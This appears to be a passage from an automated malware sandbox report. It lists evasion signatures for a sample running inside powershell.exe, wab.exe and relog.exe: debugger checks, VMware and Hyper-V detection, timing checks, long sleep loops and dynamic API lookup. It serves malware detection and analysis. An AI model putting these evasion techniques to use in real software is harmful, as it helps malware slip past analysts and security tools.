Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe	API/Special instruction interceptor: Address: 781E158
Source: C:\Program Files (x86)\Windows Mail\wab.exe	API/Special instruction interceptor: Address: 48B4133
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 26_2_21CFD1C0 rdtsc

26_2_21CFD1C0

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

17_2_0040DD85

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4966	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4927	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6314	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2804	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4930	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 1271	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: foregroundWindowGot 1723	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5317
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6494
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 486
Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 9903

Found large amount of non-executed APIs

Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 8.8 %
Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 9.3 %
Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 0.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep count: 6314 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep count: 3438 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4320	Thread sleep count: 2804 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856	Thread sleep count: 4930 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856	Thread sleep time: -14790000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856	Thread sleep count: 1271 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856	Thread sleep time: -3813000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048	Thread sleep count: 6494 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4108	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048	Thread sleep count: 2940 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7144	Thread sleep count: 486 > 30
Source: C:\Windows\SysWOW64\relog.exe TID: 8136	Thread sleep count: 9903 > 30
Source: C:\Windows\SysWOW64\relog.exe TID: 8136	Thread sleep time: -19806000s >= -30000s
Source: C:\Windows\SysWOW64\relog.exe TID: 8136	Thread sleep count: 68 > 30
Source: C:\Windows\SysWOW64\relog.exe TID: 8136	Thread sleep time: -136000s >= -30000s
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe TID: 4624	Thread sleep time: -50000s >= -30000s
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe TID: 4624	Thread sleep time: -36000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 2804 delay: -5

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_23D710F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,	17_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	18_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407898

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_00418981 memset,GetSystemInfo,

17_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: wab.exe, 0000000A.00000002.4221123486.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(R8)
Source: wscript.exe, 0000000F.00000003.2253570420.0000000004C1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2490651768.0000020B74B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\relog.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 26_2_21CFD1C0 rdtsc

26_2_21CFD1C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_045DD6E0 LdrInitializeThunk,

5_2_045DD6E0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_23D72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

10_2_23D72639

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

17_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

17_2_004044A4

Contains functionality to read the PEB

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D74AB4 mov eax, dword ptr fs:[00000030h]	10_2_23D74AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D461C3 mov eax, dword ptr fs:[00000030h]	26_2_21D461C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D461C3 mov eax, dword ptr fs:[00000030h]	26_2_21D461C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBD1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CBD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBD1D0 mov ecx, dword ptr fs:[00000030h]	26_2_21CBD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D551CB mov eax, dword ptr fs:[00000030h]	26_2_21D551CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov ecx, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
